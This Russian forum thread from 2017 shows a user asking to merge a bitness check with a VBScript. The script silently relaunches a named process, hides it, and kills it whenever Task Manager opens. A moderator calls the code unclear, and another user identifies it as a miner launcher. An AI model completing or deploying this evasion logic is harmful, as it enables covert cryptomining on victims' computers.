Имя пользователя:
Пароль:  
Помощь | Регистрация | Забыли пароль?  | Правила  

Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Скриптовые языки администрирования Windows » VBS/WSH/JS - Сойденить код

Ответить
Настройки темы
VBS/WSH/JS - Сойденить код

Новый участник


Сообщения: 30
Благодарности: 0

Профиль | Отправить PM | Цитировать


1. Перевести код с BAT в VBS
2. Нужно совместить 2 скрипта. ( Я просто не знаю как это можно сделать я не селен в этом )
1. Код какой нужно перевести
Код: Выделить весь код
 
Set xOS=x64
If "%PROCESSOR_ARCHITECTURE%"=="x86" If Not Defined PROCESSOR_ARCHITEW6432 Set xOS=x86
If %xOS%==x86 ("x86.exe") Else ("x64.exe")
2. Потом совместить этот код с этим

Код: Выделить весь код
Set WshShell = CreateObject("WScript.Shell") 
Set WshShell = Nothing

On error resume next
Set WshShell = WScript.CreateObject("WScript.Shell")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")

' Cores Counting
Const wbemFlagReturnImmediately = &h10
Const wbemFlagForwardOnly = &h20
strComputer = "."

   Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
   Set colItems = objWMIService.ExecQuery("SELECT * FROM Win32_Processor", "WQL", _
                                          wbemFlagReturnImmediately + wbemFlagForwardOnly)
cores = 0
For Each objItem In colItems
    cores = cores + objItem.NumberOfLogicalProcessors
Next
cores = cores - 1
' General Launching and Checking
do
WScript.Sleep 500
' Task Manager
Set taskcolitem = objWMIService.ExecQuery("Select * from Win32_Process")
taskmgrisrun=false
For Each objItem in taskcolitem
If objItem.Name = "Taskmgr.exe" OR objItem.Name = "taskmgr.exe" Then
taskmgrisrun = True
Exit For
End If
Next
' End Task Manager
Running = False
Set colItems = objWMIService.ExecQuery("Select * from Win32_Process")
For Each objItem in colItems
If objItem.Name = "Имя.exe" Then
Running = True
Set thisprocess=objItem
Exit For
End If
Next
If taskmgrisrun Then
    If Running Then
        thisprocess.Terminate
    End if
    If Not Running Then
        Running=True
    End if
End if
If Not Running Then
    WScript.Sleep 500
    WshShell.Run "Запуск определенного из файлов зависимости от разрядности системы, 0
End if
Loop
Если не сложно можете помочь буду благодарен.

Отправлено: 01:10, 05-07-2017

 

Ветеран


Сообщения: 27449
Благодарности: 8086

Профиль | Отправить PM | Цитировать


DetFedot, словами объясните, что Вам нужно (не «сойденить код», а саму задачу, которую Вы хотите решить).

P.S. Второй код представляет из себя просто тихий ужас невнятного назначения.

Отправлено: 01:21, 05-07-2017 | #2



Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети.

Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля.


Новый участник


Сообщения: 30
Благодарности: 0

Профиль | Отправить PM | Цитировать


Мне нужен VBS код какой будет проверять разрядность системы на счет сколько бит 86 или 64, потом проверяем запущен ли диспетчер задач если да то он находит определение имена какие я указал и делает taskkill этого процесса какой был указан в разрядности системы, после закрытия диспетчера задач программа запускает файл под разрядность системы. Ну и при открытие диспетчера задач идет вся команда по новой.

Отправлено: 07:46, 05-07-2017 | #3


Ветеран


Сообщения: 27449
Благодарности: 8086

Профиль | Отправить PM | Цитировать


DetFedot, ещё раз, медленно и по-русски, пожалуйста, с расстановкой знаков препинания во всех потребных местах. Иначе я не могу Вас понять.

Отправлено: 09:29, 05-07-2017 | #4


Новый участник


Сообщения: 3
Благодарности: 0

Профиль | Отправить PM | Цитировать


походу автор этой темы школьник, а по поводу второго скрипта это vbs для майнера.

Отправлено: 23:37, 05-07-2017 | #5


Ветеран


Сообщения: 27449
Благодарности: 8086

Профиль | Отправить PM | Цитировать


Посмотрим.

Отправлено: 05:50, 06-07-2017 | #6



Компьютерный форум OSzone.net » Программирование, базы данных и автоматизация действий » Скриптовые языки администрирования Windows » VBS/WSH/JS - Сойденить код

Участник сейчас на форуме Участник сейчас на форуме Участник вне форума Участник вне форума Автор темы Автор темы Шапка темы Сообщение прикреплено

Похожие темы
Название темы Автор Информация о форуме Ответов Последнее сообщение
Установка - [решено] Не удалось загрузить драйвер аварийного дампа,код 45,код 46(подкачки есть, дамп 256к) Костя_Лу@vk Microsoft Windows 10 4 14-04-2017 13:54
EventID - Код: 6006 , код: 6009, код: 6005. Источник - Eventlog. Panathinaikos Устранение критических ошибок Windows 6 15-04-2010 16:22
Установка - На ноутбуке есть регистрационный код (наклейка),как установить Windows имея этот код? Bara Microsoft Windows 2000/XP 9 10-02-2010 07:13
EventID - Источник: System Error, Код события: 1003, Код ошибки 00000093 Work700 Устранение критических ошибок Windows 7 24-08-2008 21:51
EventID - Код: 1000 в модуле ConnectionServices.dll; Код: 0 Источник: NMIndexingService nerona Устранение критических ошибок Windows 15 17-01-2008 22:47




 
Переход